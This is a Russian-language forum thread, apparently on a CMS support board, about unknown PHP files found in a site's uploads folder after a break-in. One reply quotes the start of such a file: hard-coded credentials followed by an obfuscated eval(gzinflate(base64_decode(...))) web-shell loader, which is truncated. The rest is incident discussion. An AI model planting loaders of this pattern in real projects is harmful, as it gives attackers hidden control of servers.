Перейти к публикации

Рекомендованные сообщения

каким образом у меня в папке могли оказаться эти файлы?

версия 5.7

Обнаружены следующие подозрительные файлы:

Имя файла: Размер: Дата:

./uploads/files/1176870862_mod_smiles.php 43.31 Kb 18.04.2007 07:34:22 неизвестен дистрибутиву

./uploads/files/1176885045_files.php 43.31 Kb 18.04.2007 11:30:45 неизвестен дистрибутиву

./uploads/files/1176885371_files.php 43.31 Kb 18.04.2007 11:36:11 неизвестен дистрибутиву

./uploads/files/1176885685_files.php 43.31 Kb 18.04.2007 11:41:25 неизвестен дистрибутиву

./uploads/files/1176886593_files.php 15.46 Kb 18.04.2007 11:56:33 неизвестен дистрибутиву

./uploads/files/1176887741_19871.php 110.82 Kb 18.04.2007 12:15:41 неизвестен дистрибутиву

ЗЫ кто то влез в админку и выставил там ПХП и ехе.

Теперь ворос как он там оказался ?

Изменено пользователем veprj
Ссылка на сообщение
Поделиться на других сайтах

что в этих файлах? какой код?

<?PHP

			 //Authentication

$login = "1"; //Login

$pass = "1";  //Pass

$md5_pass = ""; //If no pass then hash

eval(gzinflate(base64_decode('HJ3HkqNQEkU/

Ссылка на сообщение
Поделиться на других сайтах

veprj,

нужно смотреть логи апача за этот промежуток времени, кто был в админпанели и как вошел, если в логах все чисто, значит зашли под вашим паролем, его нужно менять.

На вопрос как:

1. Ваш пароль известен

2. Моды или хаки, помогли стать паролю известным.

3. Сторонние скрипты помогли стать паролю известным, тем более если он был одинаковым то вообще элементарно

4. Баг самого скрипта (такой вариант я никогда не исключаю) поэтому нужен анализ логов

Ссылка на сообщение
Поделиться на других сайтах

К сожалению логи предоставить не могу. Так как отключил на сервере вести журнал.

очень зря

Ссылка на сообщение
Поделиться на других сайтах

каким образом у меня в папке могли оказаться эти файлы?

версия 5.7

Обнаружены следующие подозрительные файлы:

Имя файла: Размер: Дата:

./uploads/files/1176870862_mod_smiles.php 43.31 Kb 18.04.2007 07:34:22 неизвестен дистрибутиву

./uploads/files/1176885045_files.php 43.31 Kb 18.04.2007 11:30:45 неизвестен дистрибутиву

./uploads/files/1176885371_files.php 43.31 Kb 18.04.2007 11:36:11 неизвестен дистрибутиву

./uploads/files/1176885685_files.php 43.31 Kb 18.04.2007 11:41:25 неизвестен дистрибутиву

./uploads/files/1176886593_files.php 15.46 Kb 18.04.2007 11:56:33 неизвестен дистрибутиву

./uploads/files/1176887741_19871.php 110.82 Kb 18.04.2007 12:15:41 неизвестен дистрибутиву

ЗЫ кто то влез в админку и выставил там ПХП и ехе.

Теперь ворос как он там оказался ?

А ты не пробовал код этих страниц посмотреть?

Возможно это файл-менеджер через www-броузер, "заточеный" для взлома.

Ссылка на сообщение
Поделиться на других сайтах

Если пароль украли, то могли сделать через троян, проверься на вирусы. С другой стороны, когда у меня была такая фигня, я у себя пароль не сменил, но после того случая уже 4 месяца все в порядке.

Ссылка на сообщение
Поделиться на других сайтах

Пароль мой маловероятно могли узнать.Так как я его за день до этого только сменил.

Значит в админку как то попали.

Ссылка на сообщение
Поделиться на других сайтах

veprj,

Как, доктор говорю, у тебя трой с новейшей сигнатурой... Если память меня не подводит, сервер у тебя на компе стоит, а не на хостинге... Может настроен не очень параноидально сервер?! :) А для закачки, в скрипт не обязательно лезть, через FTP меняются конфиги замечательно...

Изменено пользователем Stude_nt
Ссылка на сообщение
Поделиться на других сайтах

Утверждать не берусь, но не стоит валить все на хостера! Как какой взлом так хостер виноват! Не ужели у нас все хостеры такие лохи что не могут элементарную безапасность нам простым пользователям сделать? Вам не надоело все на третьих лиц валить? Ищити пожалуйста проблемы в своем творении.

Уважаемый celsoft (не в обиду сказано) вы можете гарантировать 100% безопасность своего скрипта? Если не можете то большая просьба не доказывать что во всем виноват хостер.

От Вашего ответа зависит мои дальнейшие размышления. Метод дедукции :D

Просто столкнулся недавно с ситуацией когда просто положили php файл в корень сервера и воткнули iframe в индексный файл. Варианты типа хостер отпадают сразу, сервер был личный, настройки правильные, логи пока не смотрел да и так понятно от куда ветер дует. Просто больше не откуда было...

Ссылка на сообщение
Поделиться на других сайтах

Rokki, Была бы дырочка в двиге, эксплойт бы валялся на секьюрети-форумах или обратных, про SQL-инъекцию, тоже бы не умолчали... А так, пока уязвимы версии ниже 5.1, И ТО, если не профиксены... Варианта в принципе три:

1. Троян с новейшей сигнатурой (на компе админа сайта)

2. Хостер был открыт (трой, взлом и т.д)

3. Взломан сайт на этом хостинге (другой скрипт)

Но в данном случае, у veprj, вроде как всё на своём компе стоит...

Ссылка на сообщение
Поделиться на других сайтах

Уважаемый celsoft (не в обиду сказано) вы можете гарантировать 100% безопасность своего скрипта?

Проблемы с глазами? Четвертый пункт моего сообщения не смогли прочитать? Сил нехватило. Нет мне просто интересно где я в этой теме что либо вообще про хостеров говорил?

Просто столкнулся недавно с ситуацией когда просто положили php файл в корень сервера и воткнули iframe в индексный файл.

А поповоду iframe в index.php так это батенька давно установлено как из за чего это происходит, меньше клубничку нужно смотреть и троянов собирать. Если вы не вкурсе то изменить файл на который нет прав на записи не может ниодин шелл, только FTP, и троян этот описан очень подробно в отчете лаборатории касперского, так что если не разбираетесь ненужно тут пытатся умные мысли высказывать, тут тема не про iframe обсуждается. Думаете это только DLE от этого страдает? наберите в Яндексе "iframe в index.php" и получите кучу жалоб, где DLE даже не стоял никогда, даже статические index.html были изменены, которые по определению не могут быть с багами.

ситуация с iframe была тщательно проанализирована и причиной этому либо хостер либо администратор сайта, чьи пароли забиты в FTP менеджере, кто именно занес трояна я конечно сказать немогу но отсутствие уязвимости скрипта в этом вопросе я могу гарантировать на более чем 100%

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...